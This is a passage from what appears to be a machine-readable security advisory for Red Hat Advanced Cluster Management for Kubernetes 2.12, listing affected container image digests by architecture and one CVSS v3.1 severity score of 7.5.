"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
